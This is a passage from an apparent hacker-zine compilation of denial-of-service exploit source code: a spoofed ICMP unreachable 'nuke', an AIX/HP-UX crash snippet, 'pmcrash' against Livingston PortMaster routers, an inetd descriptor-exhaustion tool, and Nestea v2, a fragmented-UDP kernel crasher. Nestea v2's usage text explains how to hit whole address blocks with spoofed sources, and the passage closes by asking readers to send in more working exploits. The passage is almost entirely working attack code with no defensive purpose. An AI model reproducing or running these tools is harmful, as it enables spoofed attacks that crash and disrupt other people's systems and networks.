        *addr = tempaddr.sin_addr.s_addr;
        return 0;
     }

int resolve_all(const char *origdest,
                const char *dest,
                const char *spoof)
     {
        if (resolve_one(origdest,&origdest_addr,"origdest address"))
return -1;
        if (resolve_one(dest,&dest_addr,"dest address")) return -1;
        if (spoof!=NULL)
          if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1;

        destaddr.sin_addr.s_addr = dest_addr;
        destaddr.sin_family      = AF_INET;
        destaddr.sin_port        = 0;
     }


/*
 * From ping.c (from original nuke.c)
 */
unsigned short in_cksum(addr, len)
    u_short *addr;
    int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1)  {
        sum += *w++;
        nleft -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
    }

    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
    sum += (sum >> 16);         /* add carry */
    answer = ~sum;              /* truncate to 16 bits */
    return(answer);
}

/*
 * This from echok, but with some mods (snuke.c) for unreach.
 */
inline int icmp_unreach_send(int socket,
                              struct sockaddr_in *address,
                              unsigned char icmp_code,
                              unsigned long spoof_addr,
                              unsigned long s_addr,
                              unsigned long t_addr,
                              unsigned s_port,
                              unsigned t_port,
                              unsigned long seq)
     {
        unsigned char packet[4098];
        struct iphdr   *ip;
        struct icmphdr *icmp;
        struct iphdr   *origip;
        unsigned char  *data;
        int i;


        ip = (struct iphdr *)packet;
        icmp = (struct icmphdr *)(packet+IPHDRSIZE);
        origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE);
        data = (char *)(packet+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE);

        memset(packet, 0, 4098);

        ip->saddr    = spoof_addr;
        ip->daddr    = t_addr;
        ip->version  = 4;
        ip->ihl      = 5;
        ip->ttl      = 255-random()%15;
        ip->protocol = IPPROTO_ICMP;
        ip->tot_len  = htons(IPHDRSIZE + size + ICMPHDRSIZE + IPHDRSIZE
+ 8);

        ip->check    = in_cksum(packet,IPHDRSIZE);

        origip->saddr    = t_addr;   /* this is the 'original' header.
*/
        origip->daddr    = s_addr;
        origip->version  = 4;
        origip->ihl      = 5;
        origip->ttl      = ip->ttl - random()%15;
        origip->protocol = IPPROTO_UDP;
        origip->tot_len  = IPHDRSIZE + 30;
        origip->id       = random()%69;

        origip->check = in_cksum(origip,IPHDRSIZE);

        *((unsigned int *)data)          = htons(s_port);
        *((unsigned int *)(data+2))      = htons(t_port);
        *((unsigned long *)(data+4))     = htonl(seq);

        /* 'original IP header + 64 bits (of bogus TCP header)' made. */

        icmp->type = 3;
        icmp->code = icmp_code;

        icmp->checksum = in_cksum(icmp,size+ICMPHDRSIZE+IPHDRSIZE+8);

        /* the entire ICMP packet it now ready. */

#ifdef ICMP_PKT_DEBUG
        printf("Packet ready. Dump: \n");
        for (i=0;i<IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8;i++)
           printf("%02X%c",*(packet+i),((i+1)%16) ? ' ' : '\n');
        printf("\n");
#endif

        return
sendto(socket,packet,IPHDRSIZE+size+ICMPHDRSIZE+IPHDRSIZE+8,0,
                      (struct sockaddr *)address,sizeof(struct
sockaddr));

        /* ICMP packet is now over the net. */

     }


void main(int argc, char * *argv) {
        int s;

        banner();
        if (argc != 3) {
           usage(argv[0]);
           return;
        }

        type = 3;
        seq=31331;
        spoof_name = argv[1];
        dest_name = argv[2];
        origdest_name = argv[1];

        resolve_all(origdest_name, dest_name, spoof_name);

        s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

#ifdef IP_HDRINCL
        printf("We have IP_HDRINCL :-)\n\n");
        if (setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
        {
        perror("setsockopt IP_HDRINCL");
        exit(1);
        };
#else
        printf("We don't have IP_HDRINCL :-(\n\n");
#endif

if(icmp_unreach_send(s,&destaddr,type,spoof_addr,origdest_addr,dest_addr,49,49,
seq++)==
-1) {
                printf("%s: error sending packet\n",argv[0]);
perror("");
                return;
        }
}

AIX 4.1.4, AIX 4.1.5, HP-UX 10.01, and HP-UX 9.05:
--------------------------------------------------

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <netdb.h>
#include <stdio.h>

main()
{
    int sock;
    struct sockaddr_in server;
    struct hostent *hp;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    /* or sock = socket(AF_INET, SOCK_STREAM, 6); */
    hp = gethostbyname("localhost");
    bcopy((char*)hp->h_addr, (char*)&server.sin_addr, hp->h_length);
    server.sin_family = AF_INET;
    server.sin_port = 23;
    connect(sock, (struct sockaddr *)&server, sizeof server);
    shutdown(sock, 2);
    server.sin_port = 24;
    connect(sock, (struct sockaddr *)&server, sizeof server);
}



Livingstone Portmappers:
-------------------------

/* Compiling instructions:

   Linux:
     gcc -O2 -fomit-frame-pounter -s -o pmfinger pmfinger.c

   Solaris 2.4:
     cc -O -s -o pmfinger pmfinger.c -lsocket -lnsl -lresolv -lucb

*/

#include <sys/time.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <pwd.h>

#ifndef sys_errlist
extern char *sys_errlist[];
#endif

#ifndef errno
extern int errno;
#endif

/* Inet sockets :-) */
int num=0;
int socks[250];

/* show sessions flag */
unsigned short int showflag=0;

char *
mystrerror(int err) {
  return(sys_errlist[err]);
}

void
exitprog(void) {
  while(num--) {
    shutdown(socks[num-1],0);
    close(socks[num-1]);
  }
  exit(0);
}

unsigned long int
resolver(host)
char *host;
{
  unsigned long int ip=0L;

  if(host && *host && (ip=inet_addr(host))==-1) {
    struct hostent *he;

    if(!(he=gethostbyname((char *)host)))
      ip=0L;
    else
      ip=*(unsigned long *)he->h_addr_list[0];
  }
  return(ip);
}

void
usage(void) {
  puts("pmcrash v0.2a - ComOS System Rebooter :-)\n"
       "Copyright (C) 1995 LAME Communications\n"
       "Written by Dr. Delete, Ph.D.\n\n"
       "Usage: pmcrash <portmaster>[:port] [<portmaster>[:port] ... ]\n");
  exit(0);
}

void
main(int argc,char *argv[]) {
  unsigned short int port=0,x=1;
  struct sockaddr_in server;
  char crash[] = { 0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3 };
  char *temp;

  if(argc<2)
    usage();

  signal(SIGPIPE,(void (*)())exitprog);
  signal(SIGHUP,(void (*)())exitprog);
  signal(SIGINT,(void (*)())exitprog);
  signal(SIGTERM,(void (*)())exitprog);
  signal(SIGBUS,(void (*)())exitprog);
  signal(SIGABRT,(void (*)())exitprog);
  signal(SIGSEGV,(void (*)())exitprog);

  server.sin_family=AF_INET;

  printf("\nConnecting..."); fflush(stdout);

  for(;x<argc;x++) {
    if((socks[num]=socket(AF_INET,SOCK_STREAM,0))==-1) {
      fprintf(stderr,"Unable to allocate AF_INET socket: %s\n",mystrerror(errno
));
      exitprog();
    }
    setsockopt(socks[num],SOL_SOCKET,SO_LINGER,0,0);
    setsockopt(socks[num],SOL_SOCKET,SO_REUSEADDR,0,0);
    setsockopt(socks[num],SOL_SOCKET,SO_KEEPALIVE,0,0);
    if((temp=strstr(argv[x],":"))) {
      *temp++=(char)0;
      server.sin_port=htons((atoi(temp)));
    }
    else
      server.sin_port=htons(23);
    if(!(server.sin_addr.s_addr = resolver(argv[x]))) {
      fprintf(stderr,"Unable to resolve host '%s'.\n",argv[x]);
      close(socks[num]);
      continue;
    }
    if(connect(socks[num],(struct sockaddr *)&server,sizeof(struct sockaddr_in)
)) {
      printf("!"); fflush(stdout);
      /* fprintf(stderr,"Unable to connect to %s. (%s)\n",argv[x],mystrerror(er
rno)); */
      close(socks[num]);
      continue;
    }
    printf("."); fflush(stdout);
    num++;
  }

  printf("\nSweeping..."); fflush(stdout);

  for(x=0;x<num;x++) {
    write(socks[x],crash,10);
    printf("."); fflush(stdout);
  }
  puts("\n");
  sleep(4);
  exitprog();
}


Linux: 
-------
Octopus: (crashes inetd.. Tested on linux 2.0.30)...

#include <stdio.h>
#include <stdlib.h>
#include <bstring.h>   /* needed for Irix */
#include <unistd.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h> /* needed for Irix */
#include <sys/socket.h>
#include <signal.h>
#include <netdb.h>
#define MAX_DESCRIPTORS 256

int i, fd;

main(argc,argv)
int argc;
char *argv[];
{
   int     opt,pid;
   struct  sockaddr_in sin;
   char    buf[2];
   struct hostent *he;
   if( argc < 2 ) {
      printf("Usage:\t%s address [port]\n", argv[0] );
      printf("\twhere address is an internet address\n");
      printf("\tand port is an optional port number (default=25)\n");
      exit (0);
   }
   pid = getpid();
   opt = 1;
   if((he=gethostbyname(argv[1]))==NULL)
     {
	herror("gethostbyname");
	exit(1);
     }
   bzero((char *)&sin, sizeof(sin));
   sin.sin_family = AF_INET;
   sin.sin_addr = *((struct in_addr*)he->h_addr);
   sin.sin_port = htons((argc > 2) ? atoi(argv[2]) : 25);
   for(i=0;i<MAX_DESCRIPTORS;i++)
     {
	
         if((fd = socket(AF_INET, SOCK_STREAM, 0))<0)
	   {
	      perror("socket");
	      exit(1);
	   }
	if((connect(fd, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
	    printf("connect %i failed.\n",i);
	    perror("connect");
	    exit(1);
	 }
		
	printf("pid: %i, desc %i\n", pid, i);
     }
}

Nestea ver.2:
Crashes Linux Slack 3.3 (maybe 3.4), and it's very very very kewl...

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define MAGIC2  108
#define PADDING 256    /* datagram frame padding for first packet */
#define COUNT   500    /* we are overwriting a small number of bytes we 
			shouldnt have access to in the kernel. 
			to be safe, we should hit them till they die :>  */
struct ipstuph
{
	int p1;
	int p2;
	int p3;
	int p4;
} startip, endip;

void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock, j, bequiet = 0;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    char hit_ip[18], dst_ip2[18];
    struct in_addr addr;
    
    fprintf(stderr, "\n[1;34mNestea v2 [0;34moriginally by[0m: [1;34mhumble [0;34m+ [1;34mttol mods[0m\n");
    fprintf(stderr, "[0;34mColor and Instructions was done by [0m: [1;34mttol[0m\n");
    fprintf(stderr, "[1;34mNote[0m : [1;34mttol released Nestea v2.  humble had nothing to do with \n       it, don't nag him about it.  -ttol@ttol.net[0m\n\n");
    
    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("[1;34mraw socket[0m");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 4) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "[1;34mWhat the hell kind of IP address is that?[0m\n");
        exit(1);
    }

    strcpy(dst_ip2,argv[3]);
    if(sscanf(argv[2],"%d.%d.%d.%d",&startip.p1,&startip.p2,&startip.p3,
                      &startip.p4) != 4)
    {
      fprintf(stderr, "[1;34mError, arg2(startip) [0m: [0;34mNeed an ip that contains 4 zones[0m\n");                           
      exit(1);
    }
    if (startip.p1 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 1 of start ip is incorrect \
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (startip.p2 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 2 of start ip is incorrect \
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (startip.p3 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 3 of start ip is incorrect \
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (startip.p4 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 4 of start ip is incorret \
                       (greater than 255)[0m\n");
       exit(1);
    }
    if(sscanf(argv[3],"%d.%d.%d.%d",&endip.p1,&endip.p2,&endip.p3,
                      &endip.p4) != 4)
    {
      fprintf(stderr, "[1;34mError, arg3(endip) [0m: [[0;34mNeed an ip that \
                       contains 4 zones[[0m\n");
      exit(1);
    }
    if (endip.p1 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 1 of end ip is incorrect \
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (endip.p2 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 2 of end ip is incorrect \
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (endip.p3 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 3 of end ip is incorrect
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (endip.p4 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 4 of end ip is incorrect
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (startip.p1 != endip.p1) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 1 of start ip and end ip is different[0m\n");
      exit(1);
    }
    if (startip.p2 != endip.p2) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 2 of start ip and end ip is different[0m\n");
      exit(1);
    }
    if (startip.p3 != endip.p3) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 3 of start ip and end ip is different[0m\n");
      exit(1);
    }
                                        
    while ((i = getopt_long(argc, argv, "s:t:n:q")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            case 'q':               /* quiet mode */
                bequiet = 1;
                break;                                                      
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "[1;34mDeath [0;34mon flaxen wings ([1;34myet again[0;34m)[0m:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "[1;34mFrom[0m: [0;34m%15s.%d[0m\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  [1;34mTo[0m: [0;34m%15s - %s.%d[0m\n", inet_ntoa(addr), 
    					    dst_ip2, dst_prt);
    fprintf(stderr, " [1;34mAmt[0m: [0;34m%5d[0m\n", count);

    if (bequiet) fprintf(stderr, "[0;34m[[1;34mquiet mode[0;34m] [0;34mEach'[1;34m.[0;34m' represents a nuked ip.  [0;34m[[0m");
    for (j=startip.p4; j <= endip.p4; j++)
    {
      sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j);
      
      if (!(bequiet)) fprintf(stderr, "[0;34m%s [1;34m[ [0m", hit_ip);
                   
      if (!(dst_ip = name_resolve(hit_ip)))
    {
          fprintf(stderr, "[0;34mWhat the [1;34mhell [0;34mkind of IP address is that?[0m\n");
          exit(1);
    }
                                        
    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        if (!(bequiet)) fprintf(stderr, "[0;34md[1;34m00[0;34mm [0m");          
        usleep(500);
    }
    if (bequiet) fprintf(stderr, "[1;34m.[0m");
    else fprintf(stderr, "[0;34m][0m\n");
    }
    if (bequiet) fprintf(stderr, "[0;34m][0m\n");
    return (0);
}

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
int i;
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + 10);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + 10);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(6);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + MAGIC2);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
    byte = 0x4F;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0 | FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 44;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

	for(i=0;i<PADDING;i++)
	{
		p_ptr[i++]=random()%255;
	}	

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
"[1;34mnestea2 [0;34msource startIP endIP [1;34m[[0;34m-s src port[1;34m] [[0;34m-t dest port[1;34m] [[0;34m-n quantity[1;34m] [[0;34m-q[1;34m][0m\n");
    fprintf(stderr, "[0;34msource   [0m: [1;34mThis is the source IP to nestea from, make it a spoof[0m\n");
    fprintf(stderr, "[0;34mstartIP  [0m: [1;34mFrom which IP should we start from? [1;34m([0;34meg 153.35.85.1[1;34m)[0m\n");
    fprintf(stderr, "[0;34mendIP    [0m: [1;34mFrom which IP should we end with?   [1;34m([0;34meg 153.35.95.255[1;34m)[0m\n");
    fprintf(stderr, "[0;34msrc port [0m: [1;34mThis is the source port to spoof from [1;34m([0;34mOPTIONAL[1;34m)[0m\n");
    fprintf(stderr, "[0;34mdest port[0m: [1;34mThis is the destination port to nestea to [1;34m([0;34mOPTIONAL[1;34m)[0m\n");
    fprintf(stderr, "[0;34mquantity [0m: [1;34mThis is how many times to nestea the victim [1;34m([0;34mperfered is 1000[1;34m)[0m\n");
    fprintf(stderr, "[0;34m-q       [0m: [1;34mThis is quiet mode so you don't see the [0;34md[1;34m00[0;34mm[1;34m's[0m\n\n");
    fprintf(stderr, "[0;34mExample  [0m: [1;34mnestea2 127.0.0.1 153.35.85.1 153.35.85.255 -n 1000[0m\n");
    fprintf(stderr, "[0;34mThe above was to hit a whole Class C of 153.35.85 with the return \naddress from 127.0.0.1 doing it 1000 times[0m\n");
    fprintf(stderr, "[0;34mExample2 [0m: [1;34mnestea2 153.35.85.32 153.35.85.32 153.85.35.32 -n 1000[0m\n");
    fprintf(stderr, "[0;34mThe above was to hit 153.35.85.32 with the source 153.35.85.32 \ndoing it 1000 times[0m\n");
    fprintf(stderr, "[1;34mI perfer example2, probably because it is the lazy man's way out[0m\n\n");
    fprintf(stderr, "                             [1;5;34mNOT TO BE DISTRIBUTED![0m\n");
     exit(0);

}

That's about most of it..... If you need more, try seaching the web...
If you have something there isn't here, mail it to us... if it works, we'll
include it in our next issue...
